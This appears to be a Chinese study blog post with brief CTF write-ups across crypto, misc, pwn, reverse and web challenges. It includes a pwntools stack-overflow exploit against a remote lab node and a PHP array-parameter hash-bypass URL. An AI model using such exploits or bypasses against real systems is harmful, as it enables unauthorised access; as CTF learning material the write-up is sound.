2.20学习

crypto

buu-这是什么

下载附件后打开看到是apk文件,试试直接用记事本打开,看到乱码以外,还有一堆有规律的符号,了解后发现是jsfuck编码,搜索在线工具解码就行

misc

buu-[BJDCTF2020]藏藏藏

下载附件,得到的是一个图片,没有信息,应该为图片隐写在虚拟机binwalk一下可以看到有一个zip,进行foremost提取,得到一个zip文件和一个图片,我们解压zip文件,得到一个文档,是二维码,将二维码另存为图片扫描一下,得到flag

pwn

buu-jarvisoj_level0

下载附件,checksec文件,没有保护机制64位,用ida64打开在main函数,点击f5反编译,看到了function双击查看在function函数中看到了read函数,这里存在栈溢出

然后找到callsystem,返回地址为0x400596编写exp(这里的偏移量为什么是0x88还未明白,待后续)

复制代码
from pwn import*
r=remote('node5.buuoj.cn',27608)
r.sendline(b'a'*(0x88)+p64(0x400596))
r.interactive()

re

nss-[SWPUCTF 2022 新生赛]upx

下载附件解压后查壳,64位,upx的壳

进行upx脱壳,进入含有upx.exe的文件夹,然后输入命令去壳成功后得到的是No packed然后用ida64打开这个文件,找到main函数,点击f5进行反编译根据这段关键的代码,就是将输入的字符串v6遍历,每一个与2进行异或后与v4比对,相同就说明输入的是flag。

逆向写代码,将v4与2异或得到的就是v6

复制代码
a='LQQAVDyWRZ]3q]zmpf]uc{]vm]glap{rv]dnce'
flag=''
for i in range(len(a)):
    flag+=chr(ord(a[i])^2)
print(flag)

web

bugku-前女友

打开环境后看到了一段文字,没有我们需要的什么信息,也没有看到任何按钮,但是注意到说的"链接",这个链接勾起了"php是世界上最好的语言"的回忆,所以这个链接应该是在页面中的,且是php代码,点击f12查看源代码,展开后可以看到有一个地方(在'一个'与'链接'的中间有其他信息),所以我们试着在这里点击试试成功得到一个链接这里用到我们之前学过的哈希碰撞,就得到flag

http://117.72.52.127:13324/?v1[]=1&v2[]=2&v3[]=1

相关推荐
西岸行者6 天前
学习笔记:SKILLS 能帮助更好的vibe coding
笔记·学习
悠哉悠哉愿意6 天前
【单片机学习笔记】串口、超声波、NE555的同时使用
笔记·单片机·学习
别催小唐敲代码6 天前
嵌入式学习路线
学习
毛小茛6 天前
计算机系统概论——校验码
学习
babe小鑫6 天前
大专经济信息管理专业学习数据分析的必要性
学习·数据挖掘·数据分析
winfreedoms6 天前
ROS2知识大白话
笔记·学习·ros2
在这habit之下6 天前
Linux Virtual Server(LVS)学习总结
linux·学习·lvs
我想我不够好。6 天前
2026.2.25监控学习
学习
im_AMBER6 天前
Leetcode 127 删除有序数组中的重复项 | 删除有序数组中的重复项 II
数据结构·学习·算法·leetcode
CodeJourney_J6 天前
从“Hello World“ 开始 C++
c语言·c++·学习